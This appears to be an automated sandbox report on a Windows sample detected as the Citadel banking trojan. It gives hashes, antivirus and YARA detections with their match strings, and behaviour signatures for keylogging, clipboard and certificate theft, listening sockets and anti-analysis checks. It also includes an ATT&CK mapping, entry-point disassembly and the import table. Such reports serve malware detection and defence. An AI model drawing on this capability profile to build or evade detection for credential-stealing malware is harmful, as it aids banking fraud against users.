Play interactive tour

Edit tour

Analysis Report executable.4080.exe

Overview

General Information

Sample Name:	executable.4080.exe
Analysis ID:	358585
MD5:	9b6886089b69bc227e48accb63231096
SHA1:	3794deb61672f08dcd4997b18780d3a0b81340fb
SHA256:	f7c242fef888f7129e510c5a2c2a9a3ada69891304017e93a235cd3148d0dde4
Infos:
Most interesting Screenshot:

Detection

Citadel

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Citadel

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

executable.4080.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\executable.4080.exe' MD5: 9B6886089B69BC227E48ACCB63231096)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
executable.4080.exe	JoeSecurity_Citadel	Yara detected Citadel	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: executable.4080.exe PID: 5424	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: executable.4080.exe PID: 5424	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x1b8a:$f: bc_remove 0x8786:$f: bc_remove 0x10a3b:$f: bc_remove 0x2298:$g: bc_add 0x8793:$g: bc_add 0x10a48:$g: bc_add 0x2987:$ggurl: http://www.google.com/webhp 0x4b85:$ggurl: http://www.google.com/webhp 0x7ed0:$ggurl: http://www.google.com/webhp 0x8022:$ggurl: http://www.google.com/webhp 0x10185:$ggurl: http://www.google.com/webhp 0x102d7:$ggurl: http://www.google.com/webhp

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.executable.4080.exe.400000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0.0.executable.4080.exe.400000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: executable.4080.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: executable.4080.exe	Virustotal: Detection: 84%			Perma Link
Source: executable.4080.exe	ReversingLabs: Detection: 82%

Machine Learning detection for sample

Show sources

Source: executable.4080.exe

Joe Sandbox ML: detected

Source: 0.1.executable.4080.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.executable.4080.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 0.0.executable.4080.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen

Cryptography:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040B74D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,

0_2_0040B74D

Compliance:

Uses 32bit PE files

Show sources

Source: executable.4080.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Spreading:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00408C33 GetFileAttributesExW,LoadLibraryA,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,ReadProcessMemory,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_00408C33

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040B41D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040B41D
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040B4D8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040B4D8

Networking:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040AC31 CreateFileW,HeapAlloc,WaitForSingleObject,InternetReadFile,WriteFile,FlushFileBuffers,CloseHandle,

0_2_0040AC31

Source: executable.4080.exe	String found in binary or memory: http://www.google.com/webhp
Source: executable.4080.exe	String found in binary or memory: http://www.google.com/webhpbccerts

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Citadel

Show sources

Source: Yara match	File source: executable.4080.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY
Source: Yara match	File source: 0.2.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00412C03 GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

0_2_00412C03

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00412AC1 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_00412AC1

E-Banking Fraud:

Yara detected Citadel

Show sources

Source: Yara match	File source: executable.4080.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY
Source: Yara match	File source: 0.2.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.executable.4080.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY

Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040344C NtQueryInformationProcess,CloseHandle,NtCreateThread,	0_2_0040344C
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_00404CCE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore,	0_2_00404CCE
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_004034F6 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	0_2_004034F6

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040F61D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_0040F61D

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00415300 InitiateSystemShutdownExW,ExitWindowsEx,

0_2_00415300

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040C570		0_2_0040C570
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040B65A		0_2_0040B65A

Source: executable.4080.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: Process Memory Space: executable.4080.exe PID: 5424, type: MEMORY

Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0

Source: classification engine

Classification label: mal80.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0041267A CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_0041267A
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_004127BF CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_004127BF

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040F3C3 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_0040F3C3

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040F36F CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_0040F36F

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0041000E CoCreateInstance,

0_2_0041000E

Source: executable.4080.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\executable.4080.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: executable.4080.exe	Virustotal: Detection: 84%
Source: executable.4080.exe	ReversingLabs: Detection: 82%

Data Obfuscation:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00411408 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_00411408

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00408610 push ss; ret

0_2_00408798

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_00405841 HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,		0_2_00405841
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040540A HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,		0_2_0040540A

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\executable.4080.exe

0_2_00411408

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\executable.4080.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_0-9667
Source: C:\Users\user\Desktop\executable.4080.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_0-9667

Source: C:\Users\user\Desktop\executable.4080.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-9759

Source: C:\Users\user\Desktop\executable.4080.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-9822

Source: C:\Users\user\Desktop\executable.4080.exe

API coverage: 2.1 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040B41D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040B41D
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040B4D8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040B4D8

Anti Debugging:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00404CCE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_00404CCE

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00404ACF VirtualProtectEx 000000FF,0774C084,0000001E,00407798,00407798

0_2_00404ACF

Source: C:\Users\user\Desktop\executable.4080.exe

0_2_00411408

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040EBCB mov edx, dword ptr fs:[00000030h]

0_2_0040EBCB

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040779B HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetLengthSid,GetCurrentProcessId,

0_2_0040779B

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040DB47 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_0040DB47

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0041280F PFXImportCertStore,GetSystemTime,

0_2_0041280F

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00411A9D GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_00411A9D

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_00409921 GetTimeZoneInformation,

0_2_00409921

Source: C:\Users\user\Desktop\executable.4080.exe

Code function: 0_2_0040F810 GetVersionExW,GetNativeSystemInfo,

0_2_0040F810

Lowering of HIPS / PFW / Operating System Security Settings:

Source: executable.4080.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040CC51 HeapAlloc,socket,bind,closesocket,		0_2_0040CC51
Source: C:\Users\user\Desktop\executable.4080.exe	Code function: 0_2_0040C961 socket,bind,listen,closesocket,		0_2_0040C961

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API13	Valid Accounts1	Valid Accounts1	Valid Accounts1	Input Capture11	Network Share Discovery1	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Application Shimming1	Access Token Manipulation11	Disable or Modify Tools1	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Application Shimming1	Access Token Manipulation11	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Install Root Certificate1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
executable.4080.exe	84%	Virustotal		Browse
executable.4080.exe	82%	ReversingLabs	Win32.Trojan.Zeus
executable.4080.exe	100%	Avira	TR/Spy.Gen
executable.4080.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.1.executable.4080.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
0.2.executable.4080.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File
0.0.executable.4080.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358585
Start date:	25.02.2021
Start time:	21:50:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	executable.4080.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 95.5%) Quality average: 86.7% Quality standard deviation: 24.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	6.281631730900597
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	executable.4080.exe
File size:	118784
MD5:	9b6886089b69bc227e48accb63231096
SHA1:	3794deb61672f08dcd4997b18780d3a0b81340fb
SHA256:	f7c242fef888f7129e510c5a2c2a9a3ada69891304017e93a235cd3148d0dde4
SHA512:	7aec380c70624cd5336f23421aa2e2899d75b9b2098deb1dc8045ad27411919c032173662ccea468c68aa0702d8f9f373030eb821fea9e50e17759e8a9df9e7e
SSDEEP:	1536:D1fuot6xHoU2Qw6bQLsUPJEqz6ohfUOcgrZi0NwuMoVEcO9fipsdtAe1zIq3/VzD:hLIxHZRbMsZ/oh8/wlNhidtA8I8VzD
File Content Preview:	MZ..............................................................................................................................................................................................................................PE..L......K.................~.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x407f7f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x4BDF10B5 [Mon May 3 18:06:45 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b14de3ce0d2ae45019008e4128864503

Entrypoint Preview

Instruction
push ebp
lea ebp, dword ptr [esp-78h]
sub esp, 00000298h
push ebx
xor ebx, ebx
push ebx
mov byte ptr [ebp+77h], bl
call 00007F0D3CB9271Ah
test al, al
je 00007F0D3CB93247h
push 00008007h
mov byte ptr [ebp+5Ch], bl
mov byte ptr [ebp+76h], 00000001h
call dword ptr [004011D4h]
lea eax, dword ptr [ebp+6Ch]
push eax
call dword ptr [004011D8h]
push eax
call dword ptr [00401260h]
cmp eax, ebx
je 00007F0D3CB92F4Ah
xor edx, edx
cmp dword ptr [ebp+6Ch], ebx
jle 00007F0D3CB92F3Ch
mov ecx, dword ptr [eax+edx*4]
cmp ecx, ebx
je 00007F0D3CB92F2Fh
cmp word ptr [ecx], 002Dh
jne 00007F0D3CB92F29h
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F0D3CB92F1Ch
cmp ecx, 6Eh
jne 00007F0D3CB92F1Bh
mov byte ptr [ebp+76h], bl
jmp 00007F0D3CB92F16h
mov byte ptr [ebp+5Ch], 00000001h
inc edx
cmp edx, dword ptr [ebp+6Ch]
jl 00007F0D3CB92EE8h
push eax
call dword ptr [004011ACh]
push esi
push edi
push dword ptr [0041932Ch]
xor eax, eax
lea esi, dword ptr [ebp+60h]
call 00007F0D3CB95F4Ch
test al, al
je 00007F0D3CB92F2Ch
mov ecx, dword ptr [ebp+60h]
lea eax, dword ptr [ebp+70h]
push eax
lea eax, dword ptr [ebp+6Ch]
push eax
mov eax, dword ptr [ebp+64h]
call 00007F0D3CB92BF3h
mov eax, esi
call 00007F0D3CB95FD6h
cmp dword ptr [ebp+70h], 000001E6h
jne 00007F0D3CB92FAEh
push dword ptr [ebp+6Ch]
call 00007F0D3CB93776h
test al, al
je 00007F0D3CB92F75h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x177c4	0x104	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1b000	0xd5c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x3e8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x18000	0x18000	False	0.610392252604	data	6.56580621678	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x19000	0x2000	0x2000	False	0.568969726562	data	5.33094975112	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x1b000	0x2000	0x2000	False	0.363159179688	data	3.6749722075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	lstrcmpiA, LoadLibraryA, WTSGetActiveConsoleSessionId, SetFileAttributesW, GetCurrentThread, SetThreadPriority, GetEnvironmentVariableW, FileTimeToDosDateTime, GetTempFileNameW, HeapReAlloc, CreateMutexW, FindFirstFileW, GetNativeSystemInfo, SetEndOfFile, CreateProcessW, HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, GetComputerNameW, GetTickCount, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, WriteFile, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, GetVersionExW, CreateFileW, OpenEventW, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, FlushFileBuffers, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, SetLastError, VirtualProtectEx, VirtualAllocEx, FindClose, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, MoveFileExW, GetUserDefaultUILanguage, GlobalLock, GlobalUnlock, CreateRemoteThread, Process32FirstW, Process32NextW, GetFileAttributesW, CreateDirectoryW, FreeLibrary, WriteProcessMemory, LocalFree, GetCurrentProcessId, HeapDestroy, DuplicateHandle, WaitForMultipleObjects, CreateEventW, GetModuleFileNameW, Sleep, VirtualFree, WaitForSingleObject, SetErrorMode, GetCommandLineW, ExitProcess, ExpandEnvironmentStringsW, GetPrivateProfileIntW, GetPrivateProfileStringW, lstrcmpiW, GetThreadContext, ResetEvent, GetProcAddress, GetModuleHandleW, SetEvent, CreateThread, GetSystemTime, GetLocalTime, CloseHandle, GetFileAttributesExW, GetProcessId, EnterCriticalSection, VirtualAlloc, LeaveCriticalSection, VirtualFreeEx, InitializeCriticalSection, SetThreadContext, HeapCreate
USER32.dll	GetCursorPos, GetIconInfo, DrawIcon, LoadImageW, CharLowerW, ToUnicode, GetKeyboardState, ExitWindowsEx, MsgWaitForMultipleObjects, GetClipboardData, TranslateMessage, CharToOemW, CharLowerBuffA, DispatchMessageW, CharUpperW, PeekMessageW, CharLowerA
ADVAPI32.dll	GetLengthSid, LookupPrivilegeValueW, SetNamedSecurityInfoW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateProcessAsUserW, RegQueryValueExW, CryptReleaseContext, RegCreateKeyExW, GetTokenInformation, GetSidSubAuthorityCount, OpenThreadToken, CryptAcquireContextW, GetSidSubAuthority, OpenProcessToken, CryptGetHashParam, EqualSid, IsWellKnownSid, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, ConvertSidToStringSidW, RegSetValueExW, CryptHashData, InitiateSystemShutdownExW, CryptCreateHash
SHLWAPI.dll	wvnsprintfW, PathIsDirectoryW, PathFindFileNameW, PathAddBackslashW, SHDeleteValueW, PathSkipRootW, SHDeleteKeyW, PathRemoveFileSpecW, UrlUnescapeA, StrStrIA, PathMatchSpecW, StrCmpNIA, wvnsprintfA, PathUnquoteSpacesW, PathIsURLW, PathQuoteSpacesW, StrCmpNIW, PathRemoveBackslashW, PathAddExtensionW, StrStrIW, PathCombineW, PathRenameExtensionW
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
WS2_32.dll	accept, listen, WSASend, WSASetLastError, socket, recv, bind, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, recvfrom, getaddrinfo, select, WSAGetLastError, getsockname, shutdown, setsockopt, sendto, getpeername, closesocket, send, freeaddrinfo
